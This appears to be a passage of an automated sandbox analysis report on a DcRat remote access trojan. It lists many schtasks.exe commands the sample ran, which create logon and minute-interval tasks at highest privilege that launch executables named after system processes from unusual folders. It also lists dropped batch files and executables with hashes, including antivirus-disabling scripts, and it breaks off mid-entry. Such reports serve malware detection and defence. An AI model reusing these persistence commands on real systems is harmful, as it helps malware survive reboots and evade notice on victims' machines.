• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:3236
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:3316
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:4320
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:3124
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:2028
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\Users\Public\taskhostw.exe'" /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:1284
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:2664
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:2084
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Windows\uk-UA\sppsvc.exe'" /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:4492
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\uk-UA\sppsvc.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:4620
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Windows\uk-UA\sppsvc.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:3596
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:4672
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /rl HIGHEST /f
  1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4184
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3708
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Windows\SchCache\cmd.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:5012
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SchCache\cmd.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4396
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Windows\SchCache\cmd.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3232
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Users\Public\taskhostw.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3116
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:1680
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 12 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2788
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4268
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2060
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4756
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "comcommonc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:1808
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "comcommon" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2076
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "comcommonc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2392
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\en-US\csrss.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:316
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\en-US\csrss.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2780
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Windows\en-US\csrss.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3244
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4040
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:704
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4340
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3764
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:1836
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:5004
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:3484
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /rl HIGHEST /f
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:4724
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /rl HIGHEST /f
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:3468
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /f
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:5020
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /rl HIGHEST /f
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:4116
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /rl HIGHEST /f
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:2992

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log
  Filesize: 1KB
  MD5: b20a84a0d572356548413fcf7e1c8ff1
  SHA1: b02347fd036ce5c9df0cac4f8898e25c1bcef9b6
  SHA256: 9d2be47e92371e5abe5f070cce2cfeaed2018f85ff7b8f22849e9088e74df971
  SHA512: d03b545a0bfcc79c1bd11f46bbec09e6cfa1159bd9b70fd297c3c847f7a397200d376098a486f23bab37fd487edff683fc0f798844d363ba41d2ae4cc7d02cef

• C:\Users\Admin\AppData\Local\Temp\AKY6NrPTox.bat
  Filesize: 199B
  MD5: a057be178907b374ad8793ca7aa478be
  SHA1: 029c1e9f31008d34d59c6bbbc3c79ba5178e7cf7
  SHA256: 581702742101391ac48b2b26a2eaa6199990934b84abfe070fba5bfebed04bba
  SHA512: fa72c3ccb46814e03e34796361a115a4d09b5e0278a6e16667a3d8bc392f667da69e0aee4332d1cfd89d525a3abfd089cb6987a0eb36d041ef12d11d3650a4a6

• C:\Users\Admin\AppData\Local\Temp\CPhDZIwY3l.bat
  Filesize: 199B
  MD5: 0c68b8bf8541d2ba1156d3e2906f0dc1
  SHA1: bca847270732e07d016980a9946f23d300c1813d
  SHA256: 1370e0d250e1aede938f94c4fad64aab114b30b025d3a3ef71dd37c264c63bc1
  SHA512: d18b9fa4428e82d6f6ed55edd6d70acc61095fe20d124b4940941c8a42cf9b3c1c85b73cd1b74e37d72086e76b678287d206e592e4e0417cf969f3c180518288

• C:\Users\Admin\AppData\Local\Temp\F4MZx53eLu.bat
  Filesize: 199B
  MD5: 3fac2909521a97a0721dd45b153fbf5d
  SHA1: 81e4aa7d209f6595dfd964d26991e5359b498d2b
  SHA256: 95e21f2b0339463e2b8c134819a370e1c0495142c8258b3c5c931f7bbecacd12
  SHA512: 6eebd64fec761ef5c51815b9918ea3ef139ae208af8bdb5eab30cb5dcbe064e4a9c9e8c4bf307f75f4b28861fb6afb3a35fdc9b66a224753938b0bdce611fb3f

• C:\Users\Admin\AppData\Local\Temp\FunChecker .bat
  Filesize: 3KB
  MD5: 42afdea7c75bc9074a22ff1be2787959
  SHA1: 24bc20691a1e99e2cf0b2bca78694701fa47720a
  SHA256: 3d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2
  SHA512: d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9

• C:\Users\Admin\AppData\Local\Temp\Jobc5AEC9X.bat
  Filesize: 199B
  MD5: d7ca49989aa6b1e8d5de9f553a9370c0
  SHA1: 73f3c05266d89e992057923197cf0f53251330da
  SHA256: 6566426a59b10f212938b9f268db906c0a0235f5acfb92c3f9ca25dfa3634e2f
  SHA512: cc75cd31c7ebde22ece42c4dc15e8a10ce90bbdbe3946df1db83087de3a13a725bc952db582f71219423409f94fa16f7d62234ddf36946cb2d1c9923da07a5b0

• C:\Users\Admin\AppData\Local\Temp\K3fI8Bd254.bat
  Filesize: 199B
  MD5: 951d9e2b6bb6c2226bde8b7aa2d81f1e
  SHA1: 4430d5e127113b81c8ac11b49a1cab50307f20c1
  SHA256: 402f98979d38d51bc76d7d74e375adb1d71ee5b262c1f047147911367f0914eb
  SHA512: e14c67adad4656043896f6a7a2d1d52112f9b1641dc2042de67497dfa76e53e68d3767995826ab942e8eeebdef47c51652958da15b3365cd13b0e8ae5799a3d5

• C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat
  Filesize: 199B
  MD5: e0d42a5447e75ec041cb9f5bffdaf4ec
  SHA1: 9a02ddf22749385d353da630aae1f6a2863afdfd
  SHA256: 6fd5cc8a902f1a481ce482a2ceedfb33cfb85ba3e8948917a39d4be3a7e8d4de
  SHA512: fe1312dd3f741d406ffa5af0fff7177d3c6f102abde6c6d44c8e9b6391eb6f7cdf427c807b868629f174c57ea0c3435aa6f165d465dd9723ba5d5bf05fcc3ce4

• C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
  Filesize: 2.4MB
  MD5: 4eab8d478ffd36a7d96ca9a8512cc447
  SHA1: cddb1b2d3656d62cdcc67125ec29f2bf83c5f346
  SHA256: a2701733d9e6d3b518072810c779b25dd7ddd683fe36196e259a551acbc1e16a
  SHA512: c5dec11ecb61486b87d26f34e90e1107562186ed16c7d9b77d2e7b47456917f2aafc2c61b6b78472a8eeaa84a93a52192c300cf79220bbe8bcc9c080db1e36d6

• C:\Users\Admin\AppData\Local\Temp\OvjOVLkpjd.bat
  Filesize: 199B
  MD5: 6e6602b0cb6bb85722b6a40cbb06d055
  SHA1: 6c385ce1d0d75957c8b5ddc6e39804fe21fc4f0f
  SHA256: 15ee8c5a463d7a2e122025568088b508510289196ea9f850aa7191401b5d9ba9
  SHA512: 292ee848dae3ff701e2f00170b63027b9a7e7a9590f1999bb730c070a570aa528909d4dd14ff8fa6d4455743c8be7c97feb05b55918fb9ddf053fbed1b4396d5

• C:\Users\Admin\AppData\Local\Temp\S2GQUB77UU.bat
  Filesize: 199B
  MD5: 3f0b8273509b654656b5e309a566eb73
  SHA1: f7e750d2d5e2e2b862cae8c42293291a894cd3a6
  SHA256: 13ae5d3c2bff65076c6c478d351e488e92660f28678396b3457bed06123e3690
  SHA512: 829e48848e980fc0373e2de28252ad2cfcc15646faae359a51aae1920ca5b6e82b59378548a31fef8e1ae58acc1641b8245ab46708a413ad18b3962fc1c08967

• C:\Users\Admin\AppData\Local\Temp\SK7IuFDp7o.bat
  Filesize: 199B
  MD5: be03b65ee5a586260742d5b400f490e2
  SHA1: 57e1ab3579f64161d8508accc87e5bd9b976153d
  SHA256: d4e1701bf6176359dd42a525175d2c7b8e4006c0884ba27e84deed78e563e438
  SHA512: f1daebf1f0c00d6ae49a22a8ec5ae01a29cf753a293072a79dff47f222f3e30548ff03262d7bdc23cf3852dfc41585a3c6f7aeb315d2cb5e3d16484135f9c5c8

• C:\Users\Admin\AppData\Local\Temp\T7QXgceCiI.bat
  Filesize: 199B
  MD5: 272139a27f07bb75d4c922cbc0e3ff22
  SHA1: 019c69a8fa94f6c579c6060bb61b4c7cd2a72b3e
  SHA256: 4f5c77dd5a2106057357e6537fec7659d32fdd1105d4ffef38b00179ce581f21
  SHA512: 26b968f6e2d7fae6f987d20c5308914dc287a240345d88dbd6df77f555f82e21cf7ab392d3d47a290a2a733e5f0032dff64f9c1c3e01b2e630120ef2935b84b8

• C:\Users\Admin\AppData\Local\Temp\a1rZrAbBst.bat
  Filesize: 199B
  MD5: 1cfcd21b46dc76c86039c4f9e05b01ff
  SHA1: d81134539a21060e9a45b8f9bc5fe19294a4f273
  SHA256: 1acd3d9ac601d0953a834ac5ef3e51f50e02c0e1506e8a88cee39f1acc9d735d
  SHA512: 0bf710dc09f82e2458340ee14e60fd6fa19e04cb02e3b7d77b48159b0fd284e2bae2d90b07de3608730a62c6dfbe850e9eb75eb111d8555f99ea9313a861d3e3

• C:\Users\Admin\AppData\Local\Temp\avPRQTW9Zy.bat
  Filesize: 199B
  MD5: 06b539d6a9da2069b07f06d56b78fad8
  SHA1: ecfae9d7a5be859895d36c93e309d602f14cacab
  SHA256: 6e1f316f5653129958a8a7165c8011dfa07b88dd0de1296e4cf2d55b213990ba
  SHA512: 05706f934d4c3a09fe249b7dcd803fd72a315c3cbb86080cb914777d917364b4ebcc3cc0cbc92c57b275690e784259b55dd4d3ba1dbd805a23855a76626fda84

• C:\Users\Admin\AppData\Local\Temp\avdisable.bat
  Filesize: 3KB
  MD5: 4c35b71d2d89c8e8eb773854085c56ea
  SHA1:

                                                                                                                                        ede16731e61348432c85ef13df4beb2be8096d9b

                                                                                                                                        SHA256

                                                                                                                                        3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42

                                                                                                                                        SHA512

                                                                                                                                        a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\b3FUfZROOv.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        a3ae517f38ae79a6d2fa73fc344ba68b

                                                                                                                                        SHA1

                                                                                                                                        2dfbced5bfc7b87bb13039e49e6b64a8408269d9

                                                                                                                                        SHA256

                                                                                                                                        74ed08dbf8034f799d14c2b004a190f32941f89d783ab0152fc966a357a8eb03

                                                                                                                                        SHA512

                                                                                                                                        940ba818bf6843197ee717415fc5c07b91783bf28b8698f7d83cef288376f49bfcc88b4bb052d7694b0270cc68bb1be6bfec8b2d1a08f0dfa6f6217053f3fd69

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\blOcFVMglb.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        f0ae2666fc43456f88f15513663ce68d

                                                                                                                                        SHA1

                                                                                                                                        753412eee83a6a70d1d503023d0b051a62e92f01

                                                                                                                                        SHA256

                                                                                                                                        98ba103a8ef13c9abb787036e3f939d5fbdda6a7e6e8ef97484db907446f94ff

                                                                                                                                        SHA512

                                                                                                                                        a6a30abea4ab0382aa90ff6eb4a18295142661ce274c26f41c6c16a6ed876e3339e93b9bc65a21a44618333b86d9ccc2dd2a20a5b5e5605f26c77967e2ab299f

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\clear_av.bat

                                                                                                                                        Filesize

                                                                                                                                        5KB

                                                                                                                                        MD5

                                                                                                                                        48d1db006fe2ae378b0f7efd561d7e56

                                                                                                                                        SHA1

                                                                                                                                        63df10216f0ad81d1d42dd2fc8c4483be5d077fc

                                                                                                                                        SHA256

                                                                                                                                        65428112138dff324acd39babd902959dbb78b6ed74a276a1d3c9993ae52847a

                                                                                                                                        SHA512

                                                                                                                                        079fa75df35b8fea18fb220b3f005d6384b28aedb2e5ae62ddd3f6db6abda7dbab091fd44d05dffb4ec41657e052f379267eef7c5126fd8bd7eb189f147806f5

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\eUivgxqvfs.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        0435f0a3516c1543429468ac78260aa5

                                                                                                                                        SHA1

                                                                                                                                        0c791250982f563724d347aea6b40edd3aaa1070

                                                                                                                                        SHA256

                                                                                                                                        0ebac18fe2b35bf9c7505c49204a16c399cf8b9a5875ccbb9d601252117253af

                                                                                                                                        SHA512

                                                                                                                                        0fc492e72663b94af2267cabd3919ae865e3e1b98a8ab060a3a76e4623abf9070284e59cdded178c4555ea0cea1b485e92402a3a22da2dfb0ddf122c02e27d41

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\guIa2jZB2U.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        02b40fab1f395c3dc558d404b3ef931b

                                                                                                                                        SHA1

                                                                                                                                        7c9ca81c91c7682c65d75d6030c9fbb117c4cf89

                                                                                                                                        SHA256

                                                                                                                                        80f1b050fa0e354f71589db99fd1ecb103b8a26976cdd5ccd83b86858896d32d

                                                                                                                                        SHA512

                                                                                                                                        ac8bb06ec498df876a415d7bf54234618c4f8c6f6489ab6620907aac399fcb544954ac13f2550e4eb2cffce18302d7fac8d398821c1942d85b33fc350c1c420a

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\iQWRCQKxyP.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        b71d3786aee14d515a6f5a7deb4c5fd1

                                                                                                                                        SHA1

                                                                                                                                        3227e8f7dc07aa57f7caa246ae5f289e063aad74

                                                                                                                                        SHA256

                                                                                                                                        c9509ef6f7e57ad296f1c442fd538353b4f6f96d212856504891535f7b889569

                                                                                                                                        SHA512

                                                                                                                                        7a39593090fa20ffdcf288ddb636425e6f4dad0154a5ba55e92f4d3d3f9be45898f80b5a1220dcf051066278329b9108283e2785866cba0a608351191b0964db

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lg1oIatdTn.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        f1390db6b412922820ad36f6f6ceae6f

                                                                                                                                        SHA1

                                                                                                                                        11310a88338f79cf374a9a12251579f8e6daf3b9

                                                                                                                                        SHA256

                                                                                                                                        7ddb6b8d9ea03c8352ffbf81dcae1bfa5ce3e3acbf860f4c229af610e1189605

                                                                                                                                        SHA512

                                                                                                                                        98b734048e74b308422df1f306fbfa2bc0118c94d6481d93ec35e9d0d2a4c48226038dbc35501e38c21fc105ff6442c2795a769a43fc6775ad48b671c07974c2

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\niOj6yjqzp.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        f7d195b72a33e0acb208d55917daf1aa

                                                                                                                                        SHA1

                                                                                                                                        40cfc7f75d250cd10f9cb4c5fcb03d4d80ab55f2

                                                                                                                                        SHA256

                                                                                                                                        40623d8113d02447ce8d7689cc27e918fbc0012fbdb18eb90c0dcc2f147002a1

                                                                                                                                        SHA512

                                                                                                                                        ed1ba77376fabe62992b674c3bc449fce18ab89834d12bfbd47768cfef88402ff2a3457171e31066960b038d7e0bced538fc6069aa56f2485b2ccb9f35590bf4

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vhzsSyDvNE.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        08118e5e801f5c7cdef6c485a0aa71fa

                                                                                                                                        SHA1

                                                                                                                                        5956d7854460eaaf67caed2248ffda9f90e5e6f8

                                                                                                                                        SHA256

                                                                                                                                        5c718a423c0c22888c6a78f88bca9ad5e0ebe3f617c4ba6f068e9f26aa8a95c2

                                                                                                                                        SHA512

                                                                                                                                        129d141a43aabd2bffc244ab14fb708db57718477ac108080cc98849cdcc9f73572b06017c3cedde64b0ad2f302eb1ac3cfcfee5403a29fc4201b77ca1ceb8a9

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\wtOcRLEbie.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        d8f8f8c9c8942de946d54d40f2527d8a

                                                                                                                                        SHA1

                                                                                                                                        12a54720941c0a254287dca70a33acf71ca255d6

                                                                                                                                        SHA256

                                                                                                                                        92c965155ed8622a699507a199d1eaa2eefe6b55a432442f17588564406cb8c4

                                                                                                                                        SHA512

                                                                                                                                        79fef5609b70950a5d4d23b5ec8d94526ef264db28fb394d240f9e5e5747e4436f8e2f8a5064abc374afc8171d0c4a0a286293417d0588d92aa9e72921f87e3f

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat

                                                                                                                                        Filesize

                                                                                                                                        42B

                                                                                                                                        MD5

                                                                                                                                        773bdbbe3e641a349d737adddf1223c0

                                                                                                                                        SHA1

                                                                                                                                        682e313b914460eefe3e2cb7a09beeacd461c108

                                                                                                                                        SHA256

